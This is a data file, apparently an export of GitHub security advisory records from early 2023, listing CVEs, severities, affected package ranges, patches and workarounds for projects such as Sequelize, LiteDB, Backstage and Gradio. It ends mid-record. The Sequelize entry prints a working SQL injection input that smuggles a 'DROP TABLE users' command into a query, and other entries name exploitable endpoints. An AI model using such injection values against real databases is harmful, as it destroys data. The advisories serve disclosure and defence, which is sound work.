'https://github.com/kubernetes/client-go/commit/44e1a07f2d513e375c4b6ee6e890040b47befe86'}, {'type': 'WEB', 'url': 'https://github.com/kubernetes/client-go/commit/e8f871a2e5fadf90fc114565abc0963967f1a373'}, {'type': 'WEB', 'url': 'https://github.com/kubernetes/kubernetes/commit/e99df0e5a75eb6e86123b56d53e9b7ca0fd00419'}, {'type': 'PACKAGE', 'url': 'https://github.com/kubernetes/client-go'}, {'type': 'WEB', 'url': 'https://groups.google.com/g/kubernetes-security-discuss/c/vm-HcrFUOCs/m/36utxAM5CwAJ'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2021-0064'}]","{'cwe_ids': ['CWE-532'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-06T23:27:56Z', 'nvd_published_at': None}" 1.4.0,GHSA-f2jh-mf2c-8278,2023-03-01T01:53:58Z,2023-02-27T15:30:20Z,,['CVE-2023-1067'],Pimcore vulnerable to Cross-site Scripting,Cross-site Scripting (XSS) - Stored in GitHub repository pimcore/pimcore 10.5.17 and prior. A patch is available and anticipated to be part of 10.5.18.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/pimcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '10.5.17'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1067'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/commit/4b5733266d7d6aeb4f221a15e005db83fc198edf'}, {'type': 'PACKAGE', 'url': 'https://github.com/pimcore/pimcore'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/31d17b34-f80d-49f2-86e7-97ae715cc045'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-28T23:26:38Z', 'nvd_published_at': '2023-02-27T14:15:00Z'}" 1.4.0,GHSA-7hv8-3fr9-j2hv,2023-02-14T21:35:10Z,2023-02-14T21:35:10Z,,['CVE-2023-25571'],Cross site scripting Vulnerability in backstage Software Catalog,"### Impact This vulnerability allows a malicious actor with access to add or modify content in an instance of the Backstage software catalog to inject script URLs in the entities stored in the catalog. If users of the catalog then click on said URLs, that can lead to an XSS attack. ### Patches This vulnerability has been patched in both the frontend and backend implementations. The default `Link` component from `@backstage/core-components` will now reject `javascript:` URLs, and there is a global override of `window.open` to do the same. In addition the catalog model as well as the catalog backend now has additional validation built in that prevents `javascript:` URLs in known annotations. ### Workarounds The general practice of limiting access to modifying catalog content and requiring code reviews greatly helps mitigate this vulnerability. ### For more information If you have any questions or comments about this advisory: * Open an issue in the [Backstage repository](https://github.com/backstage/backstage) * Visit our chat, linked to in the [Backstage README](https://github.com/backstage/backstage) ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': '@backstage/core-components'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.12.4'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@backstage/catalog-model'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.0'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@backstage/plugin-catalog-backend'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.7.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/backstage/backstage/security/advisories/GHSA-7hv8-3fr9-j2hv'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25571'}, {'type': 'WEB', 'url': 'https://github.com/backstage/backstage/commit/3d1371954512f7fa8bd0e2d357e00eada2c3e8a8'}, {'type': 'PACKAGE', 'url': 'https://github.com/backstage/backstage'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-14T21:35:10Z', 'nvd_published_at': '2023-02-14T18:15:00Z'}" 1.4.0,GHSA-vr2x-7687-h6qv,2023-03-01T01:55:31Z,2023-02-28T23:25:54Z,,['CVE-2023-25575'],api-platform/core's secured properties may be accessible within collections,"### Impact Resource properties secured with the `security` option of the `ApiPlatform\Metadata\ApiProperty` attribute can be disclosed to unauthorized users. The problem affects most serialization formats, including raw JSON, which is enabled by default when installing API Platform. Custom serialization formats may also be impacted. Only collection endpoints are affected by the issue, item endpoints are not. The JSON-LD format is not affected by the issue. The result of the security rule is only executed for the first item of the collection. The result of the rule is then cached and reused for the next items. This bug can leak data to unauthorized users when the rule depends on the value of a property of the item. This bug can also hide properties that should be displayed to authorized users. ### Patches This issue impacts the 2.7, 3.0 and 3.1 branches. Upgrade to v2.7.10, v3.0.12 or v3.1.3. ### Workarounds Replace the `cache_key` of the context array of the Serializer inside a custom normalizer that works on objects if the security option of the `ApiPlatform\Metadata\ApiProperty` attribute is used.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'api-platform/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.0.12'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'api-platform/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.1.0'}, {'fixed': '3.1.3'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'api-platform/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.7.10'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/api-platform/core/security/advisories/GHSA-vr2x-7687-h6qv'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25575'}, {'type': 'WEB', 'url': 'https://github.com/api-platform/core/commit/5723d68369722feefeb11e42528d9580db5dd0fb'}, {'type': 'WEB', 'url': 'https://github.com/FriendsOfPHP/security-advisories/blob/master/api-platform/core/CVE-2023-25575.yaml'}, {'type': 'PACKAGE', 'url': 'https://github.com/api-platform/core'}, {'type': 'WEB', 'url': 'https://github.com/api-platform/core/releases/tag/v2.7.10'}, {'type': 'WEB', 'url': 'https://github.com/api-platform/core/releases/tag/v3.0.12'}, {'type': 'WEB', 'url': 'https://github.com/api-platform/core/releases/tag/v3.1.3'}]","{'cwe_ids': ['CWE-842', 'CWE-863'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-28T23:25:54Z', 'nvd_published_at': '2023-02-28T23:15:00Z'}" 1.4.0,GHSA-wr8h-w969-36m8,2023-03-03T22:56:32Z,2023-02-21T18:30:17Z,,['CVE-2015-10085'],GoPistolet vulnerable to Improper Resource Shutdown or Release,"A vulnerability was found in GoPistolet. It has been declared as problematic. This vulnerability affects unknown code of the component MTA. The manipulation leads to denial of service. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The name of the patch is b91aa4674d460993765884e8463c70e6d886bc90. It is recommended to apply a patch to fix this issue. VDB-221506 is the identifier assigned to this vulnerability.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/gopistolet/gopistolet'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.0.0-20210418093520-a5395f728f8d'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2015-10085'}, {'type': 'WEB', 'url': 'https://github.com/gopistolet/gopistolet/pull/27'}, {'type': 'WEB', 'url': 'https://github.com/gopistolet/gopistolet/commit/b91aa4674d460993765884e8463c70e6d886bc90'}, {'type': 'PACKAGE', 'url': 'https://github.com/gopistolet/gopistolet'}, {'type': 'WEB', 'url': 'https://vuldb.com/?ctiid.221506'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.221506'}]","{'cwe_ids': ['CWE-404'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-03T22:56:32Z', 'nvd_published_at': '2023-02-21T18:15:00Z'}" 1.4.0,GHSA-x36g-4629-xp9v,2023-03-07T23:53:49Z,2023-02-27T18:32:09Z,,['CVE-2023-1070'],TeamPass External Control of File Name or Path vulnerability,External Control of File Name or Path in GitHub repository nilsteampassnet/teampass prior to 3.0.0.22.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'nilsteampassnet/teampass'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.0.23'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1070'}, {'type': 'WEB', 'url': 'https://github.com/nilsteampassnet/teampass/commit/0af3574caba27a61b16dc25c94fa51ae12d2d967'}, {'type': 'PACKAGE', 'url': 'https://github.com/nilsteampassnet/teampass'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/318bfdc4-7782-4979-956f-9ba2cc44889c'}]","{'cwe_ids': ['CWE-73'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-28T23:27:43Z', 'nvd_published_at': '2023-02-27T16:15:00Z'}" 1.4.0,GHSA-hc67-v29c-7g78,2023-02-14T21:21:17Z,2023-02-05T21:30:25Z,,['CVE-2017-20175'],Cross-site Scripting in DaSchTour matomo-mediawiki-extension,A vulnerability classified as problematic has been found in DaSchTour matomo-mediawiki-extension up to 2.4.2. This affects an unknown part of the file Piwik.hooks.php of the component Username Handler. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 2.4.3 is able to address this issue. The name of the patch is 681324e4f518a8af4bd1f93867074c728eb9923d. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-220203.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'mediawiki/matomo'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-20175'}, {'type': 'WEB', 'url': 'https://github.com/DaSchTour/matomo-mediawiki-extension/pull/17'}, {'type': 'WEB', 'url': 'https://github.com/DaSchTour/matomo-mediawiki-extension/commit/681324e4f518a8af4bd1f93867074c728eb9923d'}, {'type': 'WEB', 'url': 'https://github.com/DaSchTour/matomo-mediawiki-extension/releases/tag/v2.4.3'}, {'type': 'WEB', 'url': 'https://vuldb.com/?ctiid.220203'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.220203'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-14T21:21:17Z', 'nvd_published_at': '2023-02-05T20:15:00Z'}" 1.4.0,GHSA-7j9h-3jxf-3vrf,2023-02-15T18:11:42Z,2023-02-15T18:10:38Z,,['CVE-2023-25171'],Denial of service vulnerability on Password reset page,"### Impact Previous versions of Kiwi TCMS do not impose rate limits which makes it easier to attempt denial-of-service attacks against the Password reset page. An attacker could potentially send a large number of emails if they know the email addresses of users in Kiwi TCMS. Additionally that may strain SMTP resources. ### Patches Users should upgrade to v12.0 or later. ### Workarounds Users may install and configure a rate-limiting proxy in front of Kiwi TCMS such as Nginx and/or configure rate limits on their email server when possible. ### References [Disclosed by Ahmed Rabeaa Mosaa](https://huntr.dev/bounties/3b712cb6-3fa3-4f71-8562-7a7016c6262e) ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'kiwitcms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '12.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/kiwitcms/Kiwi/security/advisories/GHSA-7j9h-3jxf-3vrf'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25171'}, {'type': 'WEB', 'url': 'https://github.com/kiwitcms/Kiwi/commit/761305d04f5910ba14cc04d1255a8f1afdbb87f3'}, {'type': 'PACKAGE', 'url': 'https://github.com/kiwitcms/Kiwi'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/3b712cb6-3fa3-4f71-8562-7a7016c6262e'}, {'type': 'WEB', 'url': 'https://kiwitcms.org/blog/kiwi-tcms-team/2023/02/15/kiwi-tcms-120/'}]","{'cwe_ids': ['CWE-770'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-15T18:10:38Z', 'nvd_published_at': '2023-02-15T15:15:00Z'}" 1.4.0,GHSA-fqp6-fw9g-xpxp,2023-02-10T00:19:53Z,2023-02-03T18:30:26Z,,['CVE-2021-37306'],Insecure Permissions issue in jeecg-boot,An Insecure Permissions issue in jeecg-boot 2.4.5 and earlier allows remote attackers to gain escalated privilege and view sensitive information via api uri: api uri:/sys/user/checkOnlyUser?username=admin.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jeecgframework.boot:jeecg-boot-base'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.4.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37306'}, {'type': 'WEB', 'url': 'https://github.com/jeecgboot/jeecg-boot/issues/2794'}, {'type': 'PACKAGE', 'url': 'https://github.com/jeecgboot/jeecg-boot'}]","{'cwe_ids': ['CWE-732'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-04T00:30:27Z', 'nvd_published_at': '2023-02-03T18:15:00Z'}" 1.4.0,GHSA-3x49-g6rc-c284,2023-03-06T22:00:24Z,2023-02-24T16:22:50Z,,['CVE-2022-23535'],LiteDB may deserialize bad JSON on object type using _type,"### Impact LiteDB use a special field in JSON documents to cast diferent types from `BsonDocument` do POCO classes. When instance of an object are not the same of class, `BsonMapper` use a special field `_type` string info with full class name with assembly to be loaded and fit in your model. If your end-user can send to your app a plain JSON string, deserialization can load an unsafe object to fit in your model. ### Patches Version >= 5.0.13 add some basic fixes to avoid this, but is not 100% guaranteed when using `Object` type Next major version will contains a allow-list to select what king of Assembly can be loaded ### Workarounds - Avoid users send to your app a JSON string to be direct insert/update into database - Avoid use classes with `Object` type - try use an interface when possible If your app send a plain JSON string to be insert/update into database, prefer this: ``` // Bad public class Customer { public int Id { get; set; } public string Name { get; set; } public Object AnyData { get; set; } // <= Avoid use `Object` base type } // Good public class Customer { public int Id { get; set; } public string Name { get; set; } public IDictionary AnyData { get; set; } // Will accept only key/value strings } ``` ### References See this workaround fix on this commit: https://github.com/mbdavid/LiteDB/commit/4382ff4dd0dd8b8b16a4e37dfd29727c5f70f93f ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'LiteDB'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.0.13'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/mbdavid/LiteDB/security/advisories/GHSA-3x49-g6rc-c284'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-23535'}, {'type': 'WEB', 'url': 'https://github.com/mbdavid/LiteDB/commit/4382ff4dd0dd8b8b16a4e37dfd29727c5f70f93f'}, {'type': 'WEB', 'url': 'https://github.com/mbdavid/LiteDB/commit/d72c6774e6a13de2cfcd7d477d3575efeb75c8f2'}, {'type': 'PACKAGE', 'url': 'https://github.com/mbdavid/LiteDB'}, {'type': 'WEB', 'url': 'https://github.com/mbdavid/LiteDB/releases/tag/v5.0.13'}]","{'cwe_ids': ['CWE-502'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-02-24T16:22:50Z', 'nvd_published_at': '2023-02-24T23:15:00Z'}" 1.4.0,GHSA-w7pp-m8wf-vj6r,2023-02-16T19:07:57Z,2023-02-07T20:54:10Z,,['CVE-2023-23931'],Cipher.update_into can corrupt memory if passed an immutable python object as the outbuf,"Previously, `Cipher.update_into` would accept Python objects which implement the buffer protocol, but provide only immutable buffers: ```pycon >>> outbuf = b""\x00"" * 32 >>> c = ciphers.Cipher(AES(b""\x00"" * 32), modes.ECB()).encryptor() >>> c.update_into(b""\x00"" * 16, outbuf) 16 >>> outbuf b'\xdc\x95\xc0x\xa2@\x89\x89\xadH\xa2\x14\x92\x84 \x87\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' ``` This would allow immutable objects (such as `bytes`) to be mutated, thus violating fundamental rules of Python. This is a soundness bug -- it allows programmers to misuse an API, it cannot be exploited by attacker controlled data alone. This now correctly raises an exception. This issue has been present since `update_into` was originally introduced in cryptography 1.8.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'cryptography'}, 'ecosystem_specific': {'affected_functions': ['cryptography.hazmat.primitives.ciphers.Cipher']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.8'}, {'fixed': '39.0.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/pyca/cryptography/security/advisories/GHSA-w7pp-m8wf-vj6r'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-23931'}, {'type': 'WEB', 'url': 'https://github.com/pyca/cryptography/pull/8230/commits/94a50a9731f35405f0357fa5f3b177d46a726ab3'}, {'type': 'WEB', 'url': 'https://github.com/pyca/cryptography/commit/d6951dca25de45abd52da51b608055371fbcde4e'}, {'type': 'PACKAGE', 'url': 'https://github.com/pyca/cryptography'}]","{'cwe_ids': ['CWE-754'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-07T20:54:10Z', 'nvd_published_at': '2023-02-07T21:15:00Z'}" 1.4.0,GHSA-2h6c-j3gf-xp9r,2023-02-10T19:52:45Z,2023-02-10T19:52:45Z,,['CVE-2023-23626'],IPFS go-bitfield vulnerable to DoS via malformed size arguments,"### Impact When feeding untrusted user input into the size parameter of `NewBitfield` and `FromBytes` functions, an attacker can trigger `panic`s. This happen when the `size` is a not a multiple of `8` or is negative. There were already a note in the `NewBitfield` documentation: > ``` > Panics if size is not a multiple of 8. > ```` But it incomplete and missing from `FromBytes`'s documentation. This has been replaced by returning an `(Bitfield, error)` and returning a non nil error if the size is wrong. ### Patches - https://github.com/ipfs/go-bitfield/commit/5e1d256fe043fc4163343ccca83862c69c52e579 ### Workarounds - Ensure `size%8 == 0 && size >= 0` yourself before calling `NewBitfield` or `FromBytes` ### References - https://github.com/ipfs/go-unixfs/security/advisories/GHSA-q264-w97q-q778 ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/ipfs/go-bitfield'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ipfs/go-bitfield/security/advisories/GHSA-2h6c-j3gf-xp9r'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-23626'}, {'type': 'WEB', 'url': 'https://github.com/ipfs/go-bitfield/commit/5e1d256fe043fc4163343ccca83862c69c52e579'}, {'type': 'PACKAGE', 'url': 'https://github.com/ipfs/go-bitfield'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2023-1558'}]","{'cwe_ids': ['CWE-1284', 'CWE-754'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-10T19:52:45Z', 'nvd_published_at': '2023-02-09T21:15:00Z'}" 1.4.0,GHSA-px2r-cmr2-phw7,2023-02-24T16:03:43Z,2023-02-15T15:30:40Z,,['CVE-2023-25768'],Missing Authorization in Jenkins Azure Credentials Plugin,A missing permission check in Jenkins Azure Credentials Plugin 253.v887e0f9e898b and earlier allows attackers with Overall/Read permission to connect to an attacker-specified web server.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:azure-credentials'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '253.v887e0f9e898b'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25768'}, {'type': 'PACKAGE', 'url': 'https://github.com/jenkinsci/azure-credentials-plugin'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-02-15/#SECURITY-1756'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/02/15/4'}]","{'cwe_ids': ['CWE-862', 'CWE-863'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-15T18:32:57Z', 'nvd_published_at': '2023-02-15T14:15:00Z'}" 1.4.0,GHSA-gpvj-gp8c-c7p2,2023-02-24T16:01:14Z,2023-02-12T15:30:24Z,,['CVE-2019-25103'],Regular Expression Denial of Service in simple-markdown,A vulnerability has been found in simple-markdown 0.5.1 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file simple-markdown.js. The manipulation leads to inefficient regular expression complexity. The attack can be launched remotely. Upgrading to version 0.5.2 is able to address this issue. The name of the patch is 89797fef9abb4cab2fb76a335968266a92588816. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-220639.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'simple-markdown'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.5.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-25103'}, {'type': 'WEB', 'url': 'https://github.com/ariabuckles/simple-markdown/commit/89797fef9abb4cab2fb76a335968266a92588816'}, {'type': 'PACKAGE', 'url': 'https://github.com/ariabuckles/simple-markdown'}, {'type': 'WEB', 'url': 'https://github.com/ariabuckles/simple-markdown/releases/tag/0.5.2'}, {'type': 'WEB', 'url': 'https://vuldb.com/?ctiid.220639'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.220639'}]","{'cwe_ids': ['CWE-1333'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-14T01:02:08Z', 'nvd_published_at': '2023-02-12T15:15:00Z'}" 1.4.0,GHSA-337f-xr2x-6fcf,2023-03-02T20:00:00Z,2023-02-20T18:30:17Z,,['CVE-2023-25613'],Apache Kerby LdapIdentityBackend LDAP Injection vulnerability,An LDAP Injection vulnerability exists in the LdapIdentityBackend of Apache Kerby before 2.0.3.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.kerby:ldap-backend'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25613'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/directory-kerby'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/ynz3hhbbq6d980fzpncwbh5jd8mkyt5y'}]","{'cwe_ids': ['CWE-74'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-02-22T00:12:20Z', 'nvd_published_at': '2023-02-20T16:15:00Z'}" 1.4.0,GHSA-3x5j-9vwr-8rr5,2023-02-24T00:31:13Z,2023-02-23T22:10:19Z,,['CVE-2023-25823'],Update share links to use FRP instead of SSH tunneling,"### Impact This is a vulnerability which affects anyone using Gradio's share links (i.e. creating a Gradio app and then setting `share=True`) with Gradio versions older than 3.13.1. In these older versions of Gradio, a private SSH key is sent to any user that connects to the Gradio machine, which means that a user could access other users' shared Gradio demos. From there, other exploits are possible depending on the level of access/exposure the Gradio app provides. ### Patches The problem has been patched. Ideally, users should upgrade to `gradio==3.19.1` or later where the FRP solution has been properly tested. ### Credit Credit to Greg Sadetsky and Samuel Tremblay-Cossette for alerting the team","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:L/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'gradio'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.13.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/gradio-app/gradio/security/advisories/GHSA-3x5j-9vwr-8rr5'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25823'}, {'type': 'PACKAGE', 'url': 'https://github.com/gradio-app/gradio'}]","{'cwe_ids': ['CWE-798'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-23T22:10:19Z', 'nvd_published_at': '2023-02-23T22:15:00Z'}" 1.4.0,GHSA-wrh9-cjv3-2hpw,2023-02-22T22:59:09Z,2023-02-22T22:59:09Z,,['CVE-2023-25813'],Sequelize vulnerable to SQL Injection via replacements,"### Impact The SQL injection exploit is related to replacements. Here is such an example: In the following query, some parameters are passed through replacements, and some are passed directly through the `where` option. ```typescript User.findAll({ where: or( literal('soundex(""firstName"") = soundex(:firstName)'), { lastName: lastName }, ), replacements: { firstName }, }) ``` This is a very legitimate use case, but this query was vulnerable to SQL injection due to how Sequelize processed the query: Sequelize built a first query using the `where` option, then passed it over to `sequelize.query` which parsed the resulting SQL to inject all `:replacements`. If the user passed values such as ```json { ""firstName"": ""OR true; DROP TABLE users;"", ""lastName"": "":firstName"" } ``` Sequelize would first generate this query: ```sql SELECT * FROM users WHERE soundex(""firstName"") = soundex(:firstName) OR ""lastName"" = ':firstName' ``` Then would inject replacements in it, which resulted in this: ```sql SELECT * FROM users WHERE soundex(""firstName"") = soundex('OR true; DROP TABLE users;') OR ""lastName"" = ''OR true; DROP TABLE users;'' ``` As you can see this resulted in arbitrary user-provided SQL being executed. ### Patches The issue was fixed in Sequelize 6.19.1 ### Workarounds Do not use the `replacements` and the `where` option in the same query if you are not using Sequelize >= 6.19.1 ### References See this thread for more information: https://github.com/sequelize/sequelize/issues/14519 Snyk: https://security.snyk.io/vuln/SNYK-JS-SEQUELIZE-2932027","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'sequelize'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.19.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/sequelize/sequelize/security/advisories/GHSA-wrh9-cjv3-2hpw'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25813'}, {'type': 'WEB', 'url': 'https://github.com/sequelize/sequelize/issues/14519'}, {'type': 'WEB', 'url': 'https://github.com/sequelize/sequelize/commit/ccaa3996047fe00048d5993ab2dd43ebadd4f78b'}, {'type': 'PACKAGE', 'url': 'https://github.com/sequelize/sequelize'}, {'type': 'WEB', 'url': 'https://github.com/sequelize/sequelize/releases/tag/v6.19.1'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-JS-SEQUELIZE-2932027'}]","{'cwe_ids': ['CWE-89'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-02-22T22:59:09Z', 'nvd_published_at': '2023-02-22T19:15:00Z'}" 1.4.0,GHSA-87x9-7grx-m28v,2023-02-22T00:03:49Z,2023-02-22T00:03:49Z,,['CVE-2023-25656'],notation-go has excessive memory allocation on verification,"### Impact `notation-go` users will find their application using excessive memory when verifying signatures and the application will be finally killed, and thus availability is impacted. ### Patches The problem has been patched in the release [v1.0.0-rc.3](https://github.com/notaryproject/notation-go/releases/tag/v1.0.0-rc.3). Users should upgrade their `notation-go` packages to `v1.0.0-rc.3` or above. ### Workarounds Users can review their own trust policy file and check if the identity string contains `=#`. Meanwhile, users should only put trusted certificates in their trust stores referenced by their own trust policy files, and make sure the `authenticity` validation is set to `enforce` ### Credits The `notation-go` project would like to thank Adam Korczynski (@AdamKorcz) for responsibly disclosing this issue during a security fuzzing audit sponsored by CNCF and Shiwei Zhang (@shizhMSFT) for root cause analysis and detailed vulnerability report. ### References - [Resource exhaustion attacks](https://en.wikipedia.org/wiki/Resource_exhaustion_attack) ","[{'type': 'CVSS_V3', 